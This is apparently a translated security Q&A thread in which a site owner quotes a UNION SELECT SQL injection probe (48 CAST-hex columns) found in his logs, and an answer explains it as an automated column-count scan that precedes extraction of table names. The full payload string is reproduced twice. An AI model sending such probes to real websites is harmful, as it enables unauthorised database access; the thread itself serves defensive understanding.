Che cosa sta cercando di realizzare questo attacco per iniezione?

1

Il mio sito è stato ripetutamente colpito da questa query. Mi chiedo cosa l'attaccante sta cercando di ottenere? L'URL è: my.site/content/page.aspx?myID=15641111111111111%20UNION%20SELECT%20cAsT(0x2d78312d512d%20as%20char),/**/cAsT(0x2d78322d512d%20as%20char),/**/cAsT(0x2d78332d512d%20as%20char),/**/cAsT(0x2d78342d512d%20as%20char),/**/cAsT(0x2d78352d512d%20as%20char),/**/cAsT(0x2d78362d512d%20as%20char),/**/cAsT(0x2d78372d512d%20as%20char),/**/cAsT(0x2d78382d512d%20as%20char),/**/cAsT(0x2d78392d512d%20as%20char),/**/cAsT(0x2d7831302d512d%20as%20char),/**/cAsT(0x2d7831312d512d%20as%20char),/**/cAsT(0x2d7831322d512d%20as%20char),/**/cAsT(0x2d7831332d512d%20as%20char),/**/cAsT(0x2d7831342d512d%20as%20char),/**/cAsT(0x2d7831352d512d%20as%20char),/**/cAsT(0x2d7831362d512d%20as%20char),/**/cAsT(0x2d7831372d512d%20as%20char),/**/cAsT(0x2d7831382d512d%20as%20char),/**/cAsT(0x2d7831392d512d%20as%20char),/**/cAsT(0x2d7832302d512d%20as%20char),/**/cAsT(0x2d7832312d512d%20as%20char),/**/cAsT(0x2d7832322d512d%20as%20char),/**/cAsT(0x2d7832332d512d%20as%20char),/**/cAsT(0x2d7832342d512d%20as%20char),/**/cAsT(0x2d7832352d512d%20as%20char),/**/cAsT(0x2d7832362d512d%20as%20char),/**/cAsT(0x2d7832372d512d%20as%20char),/**/cAsT(0x2d7832382d512d%20as%20char),/**/cAsT(0x2d7832392d512d%20as%20char),/**/cAsT(0x2d7833302d512d%20as%20char),/**/cAsT(0x2d7833312d512d%20as%20char),/**/cAsT(0x2d7833322d512d%20as%20char),/**/cAsT(0x2d7833332d512d%20as%20char),/**/cAsT(0x2d7833342d512d%20as%20char),/**/cAsT(0x2d7833352d512d%20as%20char),/**/cAsT(0x2d7833362d512d%20as%20char),/**/cAsT(0x2d7833372d512d%20as%20char),/**/cAsT(0x2d7833382d512d%20as%20char),/**/cAsT(0x2d7833392d512d%20as%20char),/**/cAsT(0x2d7834302d512d%20as%20char),/**/cAsT(0x2d7834312d512d%20as%20char),/**/cAsT(0x2d7834322d512d%20as%20char),/**/cAsT(0x2d7834332d512d%20as%20char),/**/cAsT(0x2d7834342d512d%20as%20char),/**/cAsT(0x2d7834352d512d%20as%20char),/**/cAsT(0x2d7834362d512d%20as%20char),/**/cAsT(0x2d7834372d512d%20as%20char),/**/cAsT(0x2d7834382d512d%20as%20char)--

I primi quattro numeri in myID sono un ID legittimo. Dopo tutti quelli, è ovviamente un tentativo di iniezione SQL. Ecco come appare con %20 s sostituito con spazi e formattazione di base:

UNION SELECT cAsT(0x2d78312d512d as char),/**/ cAsT(0x2d78322d512d as char),/**/ cAsT(0x2d78332d512d as char),/**/ cAsT(0x2d78342d512d as char),/**/ cAsT(0x2d78352d512d as char),/**/ cAsT(0x2d78362d512d as char),/**/ cAsT(0x2d78372d512d as char),/**/ cAsT(0x2d78382d512d as char),/**/ cAsT(0x2d78392d512d as char),/**/ cAsT(0x2d7831302d512d as char),/**/ cAsT(0x2d7831312d512d as char),/**/ cAsT(0x2d7831322d512d as char),/**/ cAsT(0x2d7831332d512d as char),/**/ cAsT(0x2d7831342d512d as char),/**/ cAsT(0x2d7831352d512d as char),/**/ cAsT(0x2d7831362d512d as char),/**/ cAsT(0x2d7831372d512d as char),/**/ cAsT(0x2d7831382d512d as char),/**/ cAsT(0x2d7831392d512d as char),/**/ cAsT(0x2d7832302d512d as char),/**/ cAsT(0x2d7832312d512d as char),/**/ cAsT(0x2d7832322d512d as char),/**/ cAsT(0x2d7832332d512d as char),/**/ cAsT(0x2d7832342d512d as char),/**/ cAsT(0x2d7832352d512d as char),/**/ cAsT(0x2d7832362d512d as char),/**/ cAsT(0x2d7832372d512d as char),/**/ cAsT(0x2d7832382d512d as char),/**/ cAsT(0x2d7832392d512d as char),/**/ cAsT(0x2d7833302d512d as char),/**/ cAsT(0x2d7833312d512d as char),/**/ cAsT(0x2d7833322d512d as char),/**/ cAsT(0x2d7833332d512d as char),/**/ cAsT(0x2d7833342d512d as char),/**/ cAsT(0x2d7833352d512d as char),/**/ cAsT(0x2d7833362d512d as char),/**/ cAsT(0x2d7833372d512d as char),/**/ cAsT(0x2d7833382d512d as char),/**/ cAsT(0x2d7833392d512d as char),/**/ cAsT(0x2d7834302d512d as char),/**/ cAsT(0x2d7834312d512d as char),/**/ cAsT(0x2d7834322d512d as char),/**/ cAsT(0x2d7834332d512d as char),/**/ cAsT(0x2d7834342d512d as char),/**/ cAsT(0x2d7834352d512d as char),/**/ cAsT(0x2d7834362d512d as char),/**/ cAsT(0x2d7834372d512d as char),/**/ cAsT(0x2d7834382d512d as char)--

Quando eseguo questa query in SSMS, restituisce questo: Tutto il percorso attraverso -x48-Q-. Dato che questo non sta in realtà interrogando alcun dato, non posso pensare a ciò che l'attaccante spera di ottenere. Qualcuno ha mai visto qualcosa di simile prima d'ora?

    
posta silvertiger 19.12.2018 - 22:56
fonte

1 risposta

2

Sembra una semplice scansione per le vulnerabilità.

L'operatore SQL UNION richiede che la seconda query restituisca lo stesso numero di colonne del primo, in modo che l'attaccante esegua iterazioni provando unioni sempre più grandi. Se guardi probabilmente hai 48 hit contando uno alla volta, non lo stesso tentativo con 48 colonne più volte.

Se uno di questi tentativi si traduce in una pagina che contiene -x#-Q- , allora torneranno indietro e tenteranno di creare un attacco effettivo inserendo funzioni per estrarre i nomi di tabella e colonna ecc. alla posizione # .

    
risposta data 20.12.2018 - 01:10
fonte

Leggi altre domande sui tag